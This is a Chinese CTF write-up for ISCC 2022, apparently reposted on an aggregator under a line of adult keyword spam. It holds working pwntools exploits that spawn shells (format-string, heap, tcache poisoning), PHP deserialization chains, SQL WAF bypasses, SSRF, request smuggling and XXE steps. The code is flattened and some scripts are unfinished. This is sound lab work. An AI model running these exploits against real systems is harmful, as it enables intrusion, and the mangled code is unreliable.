3atv精品不卡视频,97人人超碰国产精品最新,中文字幕av一区二区三区人妻少妇,久久久精品波多野结衣,日韩一区二区三区精品

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

ISCC 2022

發(fā)布時(shí)間:2023/12/14 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 ISCC 2022 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

PWN

跳一跳(未寫完

程序流程較為簡(jiǎn)單,發(fā)現(xiàn)為64位全保護(hù)開(kāi)啟的ELF文件;

sim_treasure

簡(jiǎn)單的32位循環(huán)格式化字符串漏洞,位于棧上,無(wú)過(guò)濾\x00;且對(duì)于got表無(wú)防護(hù),故利用格式化字符串漏洞對(duì)地址泄露,并寫入printf@got為system函數(shù)地址;

調(diào)試如下:

exp如下:(運(yùn)行之后,需要先敲擊回車方可獲取權(quán)限;

from pwn import * context(os='linux',arch='i386')r = remote('123.57.69.203',7010) libc = ELF('./libc-2.27.so') sl = lambda payload : r.sendline(payload) ru = lambda str : r.recvuntil(str)ru("Can you find the magic word?\n") sl('%35$p')#泄露libc地址,計(jì)算偏移量得到system函數(shù)地址 libc_base = int(r.recvuntil(b'\n')[:-1],16)-libc.symbols['__libc_start_main']-241 system = libc_base+libc.symbols['system']payload = fmtstr_payload(6,{0x8049a60:system})#寫入printf@got為system函數(shù)地址 sl(payload) #gdb.attach(r) r.send(b'/bin/sh\x00')#觸發(fā)system("/bin/sh\x00");獲取權(quán)限r.interactive()

ISCC{a080-1273-4251-bbc7-aa89}

untidy_note

位于Free釋放函數(shù)之中,存在UAF漏洞;位于Edit編輯函數(shù)之中,存在堆溢出漏洞;但是位于遠(yuǎn)程版本之中,無(wú)法造成tcache double free;故采用堆溢出來(lái)造成堆塊重疊;進(jìn)而獲取權(quán)限;

調(diào)試如下:(泄露地址是為關(guān)鍵,但是程序不允許申請(qǐng)大的堆塊;故利用malloc_consolidate觸發(fā)得到unsorted bin的堆塊,進(jìn)而泄露地址;

如下,修改成功;

exp如下:

from pwn import *binary = './untidy_note' r = remote('123.57.69.203',7030) #r = process(binary) elf = ELF(binary) #libc = elf.libc libc = ELF('./libc-2.27.so') sla = lambda str,pay : r.sendlineafter(str,pay) def malloc(size=0x18):sla("Your choose is:\n",'1')sla("the note size is:\n",str(size))def free(index):sla("Your choose is:\n",'2')sla("index:\n\n",str(index))def edit(index,payload):sla("Your choose is:\n",'3')sla("index:\n",str(index))sla("the size is:\n",str(len(payload)))r.sendafter("Content:\n",payload)def print(index):sla("Your choose is:\n",'4')sla("index:\n",str(index))sla("Welcome to use untidy_note,Your name is:",'HN-meng') for i in range(18):malloc(0x1f) malloc(0x6)#18 for i in range(18):free(i)edit(18,b'a'*0x18+p64(0x11)) malloc()#1 觸發(fā)malloc_consolidate,從而得到unsorted bin print(1)#1 泄露地址,進(jìn)而可以計(jì)算出free_hook地址與system地址libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-608-0x10-libc.symbols['__malloc_hook'] free_hook = libc_base+libc.symbols['__free_hook'] system = libc_base+libc.symbols['system']edit(6,p64(free_hook))#編輯tcache[0x30][0/7]的fd指針,使其指向free_hook位置 malloc(0x1f)#2 malloc(0x1f)#3 申請(qǐng)free_hook地址內(nèi)容 edit(3,p64(system))# 寫入system函數(shù)地址 edit(2,b'/bin/sh\x00') #gdb.attach(r) free(2)#觸發(fā)system("/bin/sh\x00");獲取權(quán)限r.interactive()

ISCC{f1a4-75fe-4e77-9084-c69f}

create_id

函數(shù)流程極其簡(jiǎn)單,題目極其簡(jiǎn)單;

exp如下:

from pwn import * context(os='linux',arch='i386')r = remote('123.57.69.203',5310) x_addr = int(r.recvuntil("\n")[:-1],16) for i in range(3):r.sendline('0')payload = fmtstr_payload(10,{x_addr:9}) r.sendlineafter("What's your name?\n",payload)r.interactive()

ISCC{a54a-aa1e-4d2d-942e-21f8}

heapheap

該為2.27libc的堆題;較為簡(jiǎn)單,主體流程清晰可見(jiàn),僅僅存在申請(qǐng)函數(shù)與釋放函數(shù);相當(dāng)于malloc與free函數(shù)套了層殼而已;

漏洞位于Allocate申請(qǐng)函數(shù)之中,存在off by null漏洞;

而Free釋放函數(shù)之中,卻存在著一個(gè)較為嚴(yán)密的保護(hù):

此時(shí)我們已知信息off by null;且libc為2.27;而libc2.27相對(duì)于libc2.23之中的Unlink多了一下保護(hù):

if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))malloc_printerr ("corrupted size vs. prev_size");

該保護(hù)杜絕了我們利用Unlink向后合并,但時(shí)并沒(méi)有杜絕Unlink向前合并;故利用Unlink向前合并來(lái)造成堆塊重疊,進(jìn)而連續(xù)利用該漏洞攻擊__malloc_hook為gadget即可;步驟如下:

  • 首先布局,形成0x4ef-0xf0-0x4ef-0xf0的堆塊,此時(shí)利用off by null漏洞,將第三塊堆的prev_inuse與prev_size修改;進(jìn)而釋放第一塊堆,造成與第三塊堆,而第二塊堆被合并重疊;
  • 此時(shí)攻擊_IO_2_1_stdout_來(lái)泄露libc地址;首先利用堆塊重疊,造成兩個(gè)tcache bin位于同一位置,進(jìn)而修改unsorted bin殘留下來(lái)的fd指針指向_IO_2_1_stdout_,進(jìn)而泄露地址;概率為1/16
  • 同時(shí),泄露地址之后。再次利用堆塊重疊,使tcache bin的fd指針指向__malloc_hook,進(jìn)而修改為gadget,再次申請(qǐng)即可獲取權(quán)限;
  • 調(diào)試如下:

    exp如下:

    from pwn import * context(os='linux',arch='amd64')binary = './heapheap' elf = ELF(binary) #libc = elf.libc libc = ELF('./libc-2.27.so') def Allocate(size=0xf0,data=b'/bin/sh\x00'):r.sendlineafter("Please input your choice: ",'1')r.sendlineafter("Please input the size:",str(size))r.sendafter("Data:",data)def Free(index):r.sendlineafter("Please input your choice: ",'2')r.sendlineafter("Please input the index:",str(index))one = [0x4f3d5,0x4f432,0x10a41c] def pwn():Allocate(0x4ef)#0Allocate()#1Allocate(0x4ef)#2Allocate()#3Free(2)Free(1)Free(0)Allocate(0xf8,b'a'*0xf0+p64(0x600))#0Allocate(0x4f0)#1Free(1)#堆塊重疊 位于中間堆塊為0Free(0)#釋放tcache bin[0x100] 提前準(zhǔn)備Allocate(0x4ef)#0Allocate(0x5f,b'\x60\xd7')#1 重疊塊 爆破payload = p64(0xFBAD1800)+p64(0)*3+p8(0)Allocate()#2Free(2)#釋放tcache bin[0x70] 提前準(zhǔn)備#gdb.attach(r)Allocate(0xf0,payload)#2 IObuf = r.recvuntil("****")stdin_addr = u64(buf[len(buf)-31:len(buf)-23])#leaklibc_base = stdin_addr-libc.symbols['_IO_2_1_stdin_']malloc_hook = libc_base+libc.symbols['__malloc_hook']info("leak success")success(hex(libc_base))success(hex(stdin_addr))# 1 2Free(1)Allocate(0x5f,p64(malloc_hook))#4Allocate(0x5f)#5Allocate(0x5f,p64(one[2]+libc_base))#6#gdb.attach(r)info("attack success")r.sendlineafter("Please input your choice: ",'1')r.sendlineafter("Please input the size:",str(0x18))r.interactive()#0x3eba00while(True):try:#r = process(binary)r = remote('123.57.69.203',5320)pwn()except:r.close()warn("can you try again")

    ISCC{bfa8-f7b7-49ee-8cbe-b455}

    unlink

    發(fā)現(xiàn)為64位GLIBC為2.27的ELF;流程極為簡(jiǎn)易,如下(存在堆溢出漏洞):

    故采用常規(guī)的2.27libc之中的Unlink向前合并,此時(shí)發(fā)現(xiàn)并沒(méi)有給出libc附件,故采用LibcSearcher庫(kù);

    思路:

  • 存在堆溢出漏洞,故利用Unlink向前合并,得到重疊堆塊;
  • 進(jìn)而可以利用remove函數(shù)之中釋放前打印來(lái)泄露地址;
  • 從而計(jì)算出free_hook地址,進(jìn)而利用堆溢出修改tcache bin的fd指針,進(jìn)而修改free_hook為system函數(shù)地址;
  • 執(zhí)行remove函數(shù),獲取權(quán)限
  • 如下,為通用的Unlink攻擊手段:(該exp本地通過(guò),遠(yuǎn)程未通過(guò);

    from pwn import * from LibcSearcher import LibcSearcher context(log_level='debug',os='linux',arch='amd64')binary = './attachment-38' r = remote('123.57.69.203',5810) #r = process(binary) elf = ELF(binary) libc = elf.libc free_got = elf.got['free'] system_plt = elf.plt['system'] sh_addr = 0x0400896 def Allocate(index,size=0x18,data=b'/bin/sh'):r.sendline("add")r.sendlineafter("Index: ",str(index))r.sendlineafter("Size: ",str(size))r.sendlineafter("Data: ",data)def Free(index):r.sendline("remove")r.sendlineafter("Index: ",str(index))Allocate(0,0x410)#0 Allocate(1,0x68)#1 Allocate(2,0x410)#2 Allocate(3,0x68)#3Free(2) Free(1) Free(0) Allocate(0,0x410)#0 Allocate(1,0x68,b'a'*0x60+p64(0x490)+p64(0x420))#1 Free(0)#堆塊重疊#Free(1) Allocate(0,0x3f0) Allocate(2,0x18,b'b'*0x18+p32(0x71)) Free(1) main_arena = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-96 libc = LibcSearcher('__malloc_hook',main_arena-0x10) #libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-96-0x10-libc.symbols['__malloc_hook'] libc_base = main_arena-libc.dump('__malloc_hook')-0x10 system = libc_base+libc.dump('system')#libc.symbols['system'] free_hook = libc_base+libc.dump('__free_hook')#libc.symbols['__free_hook']Free(2) Allocate(2,0x18,b'c'*0x18+p64(0x71)+p64(free_hook))Allocate(1,0x68) Allocate(2,0x68,p64(system)) success(hex(libc_base)) #gdb.attach(r) Free(1)r.interactive()

    故排除錯(cuò)誤,發(fā)現(xiàn)了錯(cuò)誤位于上方腳本38行;進(jìn)行嘗試,發(fā)現(xiàn)遠(yuǎn)程libc2.27存在key;同時(shí)發(fā)現(xiàn)程序之中存在后門函數(shù),故可以省略泄露地址該步驟;在堆塊重疊之后直接可以修改got表為后面函數(shù)地址;

    exp如下:(該exp遠(yuǎn)程通過(guò)

    from pwn import * context(log_level='debug',os='linux',arch='amd64')r = remote('123.57.69.203',5810) elf = ELF('./attachment-38') puts_got = elf.got['puts'] def Allocate(index,size=0x18,data=b'/bin/sh'):r.sendline("add")r.sendlineafter("Index: ",str(index))r.sendlineafter("Size: ",str(size))r.sendlineafter("Data: ",data)def Free(index):r.sendline("remove")r.sendlineafter("Index: ",str(index))Allocate(0,0x410)#0 Allocate(1,0x68)#1 Allocate(2,0x410)#2 Allocate(3,0x68)#3Free(2) Free(1) Free(0) Allocate(0,0x410)#0 Allocate(1,0x68,b'a'*0x60+p64(0x490)+p64(0x420))#1 Free(0)#堆塊重疊Free(1) Allocate(5,0x410) Allocate(0,0x70,p64(puts_got))Allocate(1,0x68,b'/bin/sh\x00') Allocate(2,0x68,p32(0x400706)+b'\x00\x00')#0x400706 #gdb.attach(r,'b *0x400a8a') Free(1)r.interactive()

    ISCC{bbe4-b83a-47f8-8264-3411}

    h-o-s

    存在邏輯漏洞,故可以造成堆塊重疊;

    思路:

  • 利用邏輯漏洞,將bss_ck[-1]塊free掉,而bss_ck[-1]將布置為bss_ck[-1],故我們可以往bss_ck之中寫入任何地址了;
  • 利用fgets的特征,寫入內(nèi)容+1置零,將bss_ck之中的堆塊末尾置零,進(jìn)而釋放fake_chunk(fake_chunk需要堆風(fēng)水提前布置好)
  • 恢復(fù)結(jié)構(gòu),將我們這一系列的堆風(fēng)水所破壞的size域等修復(fù)好;并泄露libc地址(這里已泄露地址,但是遠(yuǎn)程未通過(guò),本地通過(guò);
  • 利用我們所制造的fake_chunk將tcache bin的fd指向free_hook,進(jìn)而修改其為system;故釋放獲取權(quán)限!
  • 查詢libc庫(kù),找了很多l(xiāng)ibc,但是遠(yuǎn)程依舊不通;此時(shí)我們想到了其中存在著后門函數(shù),故我們直接往free_hook寫入后門函數(shù)即可獲取權(quán)限;

    exp如下:

    from pwn import * from LibcSearcher import * context(log_level='debug',os='linux',arch='amd64')binary = './attachment-39' r = remote('123.57.69.203',5820) #r = process(binary) elf = ELF(binary) #libc = elf.libc #libc = ELF("/home/pwn/tools/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so") bss_ck = 0x0601120 cmd = 0x6010a0 def malloc(size=0x18,data=b''):r.sendline("fill")r.sendline(str(size))r.sendline(data)free = lambda : r.sendline("get") freeOver = lambda payload : r.sendline(b"get".ljust(8,b'\x00')+payload)malloc(0x91,b'a'*0x80+p64(0)+p64(0xf1)) for i in range(7):malloc(0x91) for i in range(6):free() freeOver(p64(0)*2+p64(0xc1)+p64(0)+p64(0xb1)+b'a'*0x48+p64(0x6010c0))free() free()malloc(0x41) malloc(0x48)#消除 unsorted bin free()#排布bss_ck malloc(0x91) malloc(0xb1,p64(0)+p64(0xb1)+b'b'*0x48+p32(0x6010c0)+b'\x00\x00\x00') free() free()malloc(0x91) for i in range(3):malloc(0xa0) for i in range(3):free() malloc(0xe1,p64(0)+p64(0xa1)+b'c'*0x90+p64(0)+p64(0x521)) free() free()malloc(0x91) malloc(0x91) malloc(0x130) malloc(0xe1,p64(0)+p64(0xa1)+b'c'*0x90+p64(0)+p64(0x151)) free() free() malloc(0x140,b'd'*0x90+p64(0)+p64(0xa1)+b'd'*0x90+p64(0)+p64(0xa1)) free() malloc(0xe1,p64(0)+p64(0xa1)+b'c'*0x90+p64(0)+p64(0x141)) free()#恢復(fù)結(jié)構(gòu)free()#泄露libc地址 main_arena = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-96 #libc = LibcSearcher('__malloc_hook',main_arena-0x10) #libc_base = main_arena-0x10-libc.dump('__malloc_hook') #system = libc_base+libc.dump('system') #free_hook = libc_base+libc.dump('__free_hook') '''libc_base = main_arena-0x10-libc.symbols['__malloc_hook'] system = libc_base+libc.symbols['system'] free_hook = libc_base+libc.symbols['__free_hook']''' libc_base = main_arena-0x10-0x03ebc30 free_hook = libc_base+0x03ed8e8 system = libc_base+0x004f550free() malloc(0x140,b'e'*0x90+p64(0)+p64(0xa1)+p64(free_hook-0x8)) malloc(0x91) malloc(0x91,b'/bin/sh\x00'+p64(system)) success(hex(cmd)) success("libc_base -> "+hex(libc_base)) success(hex(main_arena-0x10)) #gdb.attach(r) #free() malloc(0xa1,b'/bin/sh\x00') free()r.interactive()

    ISCC{af31-219c-4214-b561-930e}

    Huge_Space(未寫

    from pwn import * context(log_level='debug',os='linux',arch='amd64')binary = './attachment-33' #r = remote('123.57.69.203',5330) r = process(binary) elf = ELF(binary) libc = elf.libcpop_rdi_ret = 0x00400be3 leave_ret = 0x0040090f ret = 0x00400709 sh = 0x04008F6 cmd_addr = 0x6010c0 def Allocate(index,size=0x18,data=b'/bin/sh\x00'):r.sendline("+++")r.sendlineafter("Index:",str(index))r.sendlineafter("Size: ",str(size))r.sendlineafter("Data: ",data)def Show(index,size):r.sendline("print")r.sendlineafter("Index: ",str(index))r.sendlineafter("Size: ",str(size))r.sendline(p64(0)*8+p64(cmd_addr+0x350)+p64(leave_ret))#布置棧遷移Allocate(0,0x18,p64(0)*3+p64(0xd81))#修改top chunk的size域 Allocate(1,0x1000)#觸發(fā)malloc consolidateAllocate(2,0xd50,b'aaaaaa')#將原h(huán)eap申請(qǐng)完畢 Show(2,0x10)#泄露地址 main_arena = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-96 libc_base = main_arena-0x10-libc.symbols['__malloc_hook']Allocate(3,0x22000,b'a'*0x10+b'\x00'*(0x24518)+p64(0))#24518 success(hex(main_arena)) gdb.attach(r,'b *0x400b65')#gdb.attach(r,'b *0x0400971')one1 = 0x0400BDA one2 = 0x0400BC0 payload = p64(one1)+p64(0)+p64(1)+p64(cmd_addr+0x10)+p64(0)+p64(0)+p64(0x601458)+p64(one2)+b'/bin/sh\x00' r.sendline(b"exit\x00\x00\x00\x00"+b'/bin/sh\x00'+p64(sh)+b'b'*0x340+payload)r.interactive()

    WEB

    冬奧會(huì)

    該題較為簡(jiǎn)單;

    ISCC{W11lcOme_t0_Beijing8_2O22_W111Nter_0lymp1cs}

    Easy-SQL

    如下,發(fā)現(xiàn)

    ┌──(kali?kali)-[~/桌面]

    └─$ sqlmap -u “http://59.110.159.206:7010/?id=1” -dbs --batch

    然后經(jīng)過(guò)測(cè)試,發(fā)現(xiàn)select被ban了,故利用MYSQL8特性TABLE發(fā)現(xiàn)了zip文件

    對(duì)http://59.110.159.206:7010/ypHeMPardErE.zip@beaxia.cn該鏈接進(jìn)行下載zip文件

    如下語(yǔ)句,為拼接語(yǔ)句;GET[id]無(wú)法使用select語(yǔ)句; $sql = "select * from users where id=$id"; $safe = preg_match('/select/is', $id);如下為POST[username、passwd]的傳參,以及拼接代碼;發(fā)現(xiàn)對(duì)于passwd經(jīng)過(guò)了sqlWaf過(guò)濾; $username = strval($_POST['username']); $passwd = strval($_POST['passwd']); if ( !sqlWaf($passwd) )die('damn hacker'); $sql = "SELECT * FROM users WHERE username='${username}' AND passwd= '${passwd}'";sqlWaf函數(shù)如下: function sqlWaf($s) {$filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';if (preg_match($filter,$s))return False;return True; }

    ISCC{Sql123_InJect10n_Is_sImp15le_IsNT_it}

    Pop2022

    首先發(fā)現(xiàn)為PHP反序列化攻擊,同時(shí)發(fā)現(xiàn)其為原題BUUCTF [MRCTF2020]Ezpop;僅僅改了變量而已;可以查詢資料;開(kāi)始攻擊;如下為分析過(guò)程:

    class Road_is_Long{public $page;public $string;public function __construct($file='index.php'){//創(chuàng)建時(shí),觸發(fā)該函數(shù)$this->page = $file;}public function __toString(){//當(dāng)echo對(duì)象時(shí),觸發(fā)該函數(shù)return $this->string->page;}public function __wakeup(){//反序列化觸發(fā)該函數(shù)if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {echo "You can Not Enter 2022";$this->page = "index.php";}} }class Try_Work_Hard{protected $var;public function append($value){include($value);//包含文件,危險(xiǎn)函數(shù)}public function __invoke(){//當(dāng)對(duì)象作為函數(shù)調(diào)用的時(shí)候,將會(huì)調(diào)用該函數(shù)$this->append($this->var);} }class Make_a_Change{public $effort;public function __construct(){$this->effort = array();}public function __get($key){//當(dāng)訪問(wèn)一些不可訪問(wèn)的對(duì)象屬性時(shí),調(diào)用該方法$function = $this->effort;return $function();} }

    如下為exp;(將會(huì)獲取flag.php經(jīng)過(guò)base64轉(zhuǎn)換后的密文,故使用base64解密即可;

    class Try_Work_Hard {protected $var="php://filter/read=convert.base64-encode/resource=flag.php";}class Make_a_Change{public $effort;} class Road_is_Long{public $page;public $string;public function __construct(){$this->string = new Make_a_Change();} }$a = new Road_is_Long(); $a->page = new Road_is_Long(); $a->page->string->effort = new Try_Work_Hard(); echo urlencode(serialize($a)); /* 思路為: 首先讓Make_a_Change對(duì)象中的$effort作為對(duì)象,然后觸發(fā)__get函數(shù),導(dǎo)致$effort作為函數(shù)執(zhí)行; 此時(shí)我們讓$effort為Try_Work_Hard對(duì)象,則會(huì)執(zhí)行__invoke函數(shù),進(jìn)而調(diào)用了append函數(shù),進(jìn)行了文件包含攻擊,讀出flag 鏈子圖如下: Road -|-|-page -> Road -|-|-string |-page -> Make -|-|-string |-effort -> Try -|-|-var */

    解密后原文如下:

    <?php //ISCC{125fafa1_BeiJIN9G_H0t_fffffff5word}

    讓我康康!(未寫完

    經(jīng)過(guò)一定的嘗試,發(fā)現(xiàn)訪問(wèn)一些路徑時(shí)Server字段改為了mitmproxy;而mitmproxy為中間代理;故服務(wù)端為gunicorn/20.0.0服務(wù),且存在中間代理;故可以嘗試請(qǐng)求走私;

    如下,小小測(cè)試,得到一個(gè)flag所在位置信息,嘗試直接訪問(wèn),發(fā)現(xiàn)被WAF了

    嘗試走私,利用gunicorn <= 20.0.4版本下的通用走私漏洞;發(fā)現(xiàn)存在走私漏洞;

    secr3t_ip:127.0.0.1

    findme

    首先查看源碼,發(fā)現(xiàn)提示信息;故訪問(wèn)http://59.110.159.206:8030/unser.php;得到源碼;

    <?phphighlight_file(__FILE__);class a{public $un0;public $un1;public $un2;public $un3;public $un4;public function __destruct(){if(!empty($this->un0) && empty($this->un2)){$this -> Givemeanew();if($this -> un3 === 'unserialize'){$this -> yigei();}else{$this -> giao();}}}public function Givemeanew(){$this -> un4 = new $this->un0($this -> un1);}public function yigei(){echo 'Your output: '.$this->un4;}public function giao(){@eval($this->un2);}public function __wakeup(){include $this -> un2.'hint.php';} }$data = $_POST['data']; unserialize($data);

    可以發(fā)現(xiàn)存在hint.php位于__wakeup()魔術(shù)方法之中;故使用php偽協(xié)議經(jīng)過(guò)拼接讀取hint.php;

    <?php highlight_file(__FILE__); class a{public $un0;public $un1;public $un2;public $un3;public $un4;public function __construct(){ include $this -> un2.'hint.php';} }$a=new a(); $a->un2= 'php://filter/read=convert.base64-encode/resource='; $s = serialize($a); echo $s; #O:1:"a":5:{s:3:"un0";N;s:3:"un1";N;s:3:"un2";s:49:"php://filter/read=convert.base64-encode/resource=";s:3:"un3";N;s:3:"un4";N;}

    如下,發(fā)現(xiàn)了hint.php:

    <?php $a = 'flag在當(dāng)前目錄下以字母f開(kāi)頭的txt中,無(wú)法爆破出來(lái)';

    如上,為解密后的內(nèi)容,此時(shí)我們便得知了一個(gè)新的信息,flag所在位置信息;

    glob是php自5.3.0版本起開(kāi)始生效的一個(gè)用來(lái)篩選目錄的偽協(xié)議,由于它在篩選目錄時(shí)是不受open_basedir的制約的,所以我們可以利用它來(lái)繞過(guò)限制,我們新建一個(gè)目錄在/var/www/下命名為test;

    FilesystemIterator為php目錄迭代器

    故利用glob偽協(xié)議,查看匹配的文件路徑模式;進(jìn)而得到flag文件名,進(jìn)而訪問(wèn)該文件得到flag;

    <?php highlight_file(__FILE__); class a{public $un0= 'FilesystemIterator';public $un1= 'glob://f*';public $un3= 'unserialize'; } $a = new a(); echo serialize($a);

    ISCC{W0w!_You_r3a1_KN0~_Unse2!!!}

    愛(ài)國(guó)敬業(yè)好青年-2

    首先查看源代碼,發(fā)現(xiàn)了一些特別的東西,如下:

    <script>$(document).ready(function(){//ready方法檔加載后激活函數(shù)$("iframe").attr({"src":"inner"})//iframe中src屬性嵌套的頁(yè)面的 URL 地址$.ajax({url:"change",type:"GET"});//該部分訪問(wèn)了遠(yuǎn)程的url資源$("button").removeAttr("disabled");//該部分移除了disabled屬性setTimeout(function () {$("button").attr({"disabled":"true"});},1200)setTimeout(function () {$.ajax({url:"change",type:"POST"});},2000)}); </script> <!該部分為js代碼,可以發(fā)現(xiàn)其使用了ajax(該方法通過(guò) HTTP 請(qǐng)求加載遠(yuǎn)程數(shù)據(jù))<form class="form" id="a-form" method='POST' action="flag"> <button type="submit" id='true_button' disabled ='true'>提交</button> <!該部分為html代碼,可以發(fā)現(xiàn)其使用了POST方法,訪問(wèn)了flag頁(yè)面; <p>經(jīng)緯度示例:177°30'E, 25°33'N<a style ="border:none;cursor:default;" onclick="return false" href="info"></a>!</p> <!該代碼可以發(fā)現(xiàn)存在info頁(yè)面,該頁(yè)面為一個(gè)假的flag;而對(duì)于onclink事件返回假,無(wú)法返回真;

    故,我們根據(jù)該部分代碼,發(fā)現(xiàn)了inner、change、flag、info四個(gè)頁(yè)面;而這四個(gè)url資源分別負(fù)責(zé)不同的功能;inner頁(yè)面為提交頁(yè)面,嵌入到了原頁(yè)面;change猜測(cè)為一個(gè)開(kāi)關(guān);flag頁(yè)面為flag所在頁(yè)面,但不能直接訪問(wèn);info頁(yè)面為一個(gè)假的flag頁(yè)面;

    查看inner頁(yè)面,發(fā)現(xiàn)如下js代碼:

    <button style="opacity: 1" type="submit" id='button' onclick="enable()">提交</button> <script type="text/javascript"> function enable(){window.alert('flas=icss{Y0u_M@y_FiNd_1_WRONG_eNtrance!!!}') } </script> <!該部分代碼將永遠(yuǎn)返回的是假的flag

    此時(shí)再看原網(wǎng)頁(yè)代碼,發(fā)現(xiàn)其以POST的形式提交給flag頁(yè)面 lati、langti變量于flag頁(yè)面,但是由于原頁(yè)面的js代碼限制,無(wú)論提交什么都會(huì)返回假的flag,而提交形式提示為經(jīng)緯度;

    經(jīng)過(guò)多次嘗試,發(fā)現(xiàn)模擬原網(wǎng)頁(yè)的訪問(wèn)流程;但繞過(guò)原網(wǎng)頁(yè)的限制直接對(duì)flag頁(yè)面POST傳參,首先訪問(wèn)change頁(yè)面,再次POST傳參flag頁(yè)面(北京天安門廣場(chǎng)經(jīng)緯度),發(fā)現(xiàn)flag;

    ISCC{YY9YYe7Eessss_1_10vE_ChIN@0_159SNO}

    這是一道代碼審計(jì)題

    訪問(wèn)頁(yè)面,發(fā)現(xiàn)提示為/index,故訪問(wèn)index頁(yè)面,發(fā)現(xiàn)出現(xiàn)字符404;然后使用BP抓包,發(fā)現(xiàn)存在Cookie字段,而我們并未有過(guò)登錄的操作,故我們嘗試修改Cookie,發(fā)現(xiàn)提示:

    故添加嘗試傳參?url=127.0.0.1,發(fā)現(xiàn)代碼;

    訪問(wèn)頁(yè)面,發(fā)現(xiàn)存在加密,故進(jìn)行base100解密,進(jìn)而獲取源代碼;

    from flask import render_template import addr as addr import urlparse import struct import socket import base64 import redef geneSign():if(control_key==1):return render_template("index.html")#返回替換模板參數(shù)后的模板文本,即返回index.html文本內(nèi)容,經(jīng)過(guò)嘗試,發(fā)現(xiàn)無(wú)法直接訪問(wèn)else:return "You have not access to this page!"def check_ssrf(url):#檢測(cè)ssrf函數(shù),關(guān)鍵函數(shù)hostname = urlparse(url).hostname#urlparse庫(kù)用于把url解析為各個(gè)組件,此時(shí)得到主機(jī)名(即域名或IP地址try:if not re.match('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):#正則匹配if not re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):#該處匹配了@字符,與下方的匹配一直raise BaseException("url format error")if re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):#看似需要通過(guò)三處匹配,實(shí)則只進(jìn)行了一個(gè)匹配if judge_ip(hostname):#需要再次通過(guò)跳轉(zhuǎn)IP函數(shù)return Truereturn False, "You not get the right clue!"else:#該跳轉(zhuǎn)之后為False,無(wú)需關(guān)心ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]if is_inner_ipaddress(ip_address):return False,"inner ip address attack"else:return False, "You not get the right clue!"except BaseException as e:return False, str(e)except:return False, "unknow error"def ip2long(ip_addr):return struct.unpack("!L", socket.inet_aton(ip_addr))[0]def is_inner_ipaddress(ip):ip = ip2long(ip)print(ip)return ip2long('127.0.0.0') >> 24 == ip >> 24 or ip2long('10.0.0.0') >> 24 == ip >> 24 or ip2long('172.16.0.0') >> 20 == ip >> 20 or ip2long('192.168.0.0') >> 16 == ip >> 16 or ip2long('0.0.0.0') >> 24 == ip >> 24def waf1(ip):#該函數(shù)相當(dāng)于匹配是否存在forbidden_list列表之中的字符forbidden_list = [ '.', '0', '1', '2', '7']for word in forbidden_list:if ip and word:if word in ip.lower():return Truereturn Falsedef judge_ip(ip):if(waf1(ip)):#首先需要通過(guò)一層WAFreturn Falseelse:addr = addr.encode(encoding = "utf-8")ipp = base64.encodestring(addr)#base64ipp = ipp.strip().lower().decode()#分割小寫if(ip==ipp):#判斷是否相等global control_keycontrol_key = 1#如果相等,則設(shè)置key為1return Trueelse:return False

    進(jìn)行一定的代碼審計(jì),發(fā)現(xiàn)我們直接傳入127.0.0.1將會(huì)被ban掉;所以按代碼邏輯,將127.0.0.1進(jìn)行base64加密之后為MTI3LjAuMC4x,故該加密最后執(zhí)行時(shí)將會(huì)被解密為127.0.0.1,從而達(dá)到SSRF的效果;

    此時(shí)我們又得到了新的信息,便是/mti3ljaumc4x與一個(gè)Cookiea_cookie = aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ==

    故我們攜帶該Cookie并訪問(wèn)頁(yè)面/mti3ljaumc4x,發(fā)現(xiàn)存在登錄框,且泄露了一定的信息:

    嘗試采用XXE泄露flag;

    <script type="text/javascript">function codelogin(){var name = $("#name").val();var password = $("#password").val();if(name == "" || word == ""){alert("Please enter the username and password!");return;}//聲明數(shù)據(jù),將位于下方ajax訪問(wèn)之中傳遞數(shù)據(jù)var data = "<user><name>" + name + "</name><password>" + password + "</password></user>";$.ajax({contentType: "application/xml;charset=utf-8",type: "POST",url: "codelogin",//發(fā)現(xiàn)存在codelogin頁(yè)面data: data,//數(shù)據(jù)dataType: "xml",//表明數(shù)據(jù)為xml類型anysc: false,success: function (result) {//getElementsByTagName返回帶有指定標(biāo)簽名的對(duì)象的集合var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;if(code == "0"){$(".msg").text(msg + " login fail!");//返回 id 為 msg 的元素節(jié)點(diǎn)的文本內(nèi)容}else if(code == "1"){$(".msg").text(msg + " login success!");}else{$(".msg").text("error:" + msg);}},error: function (XMLHttpRequest,textStatus,errorThrown) {$(".msg").text(errorThrown + ':' + textStatus);} }); } </script>

    故我們可以直接向codelogin頁(yè)面以POST形式提交data,而data之中利用XXE來(lái)泄露出flag;故利用$(“.msg”).text進(jìn)而回顯flag

    ISCC{jQvb8-aqiuVtrX19-i71bl18c-ew08Sq0xf}

    參考鏈接: XXE從入門到放棄

    Reverse

    Amy’s Code

    首先PE探測(cè)為32位;進(jìn)而使用ida32打開(kāi);搜索main函數(shù);

    發(fā)現(xiàn)sub_411433函數(shù)之中sub_412550函數(shù)存在加密流程;加密過(guò)程為如下;array為數(shù)組,ida32可以查看發(fā)現(xiàn);同時(shí)發(fā)現(xiàn)sub_4115FF(Destination);之中存在異或加密;

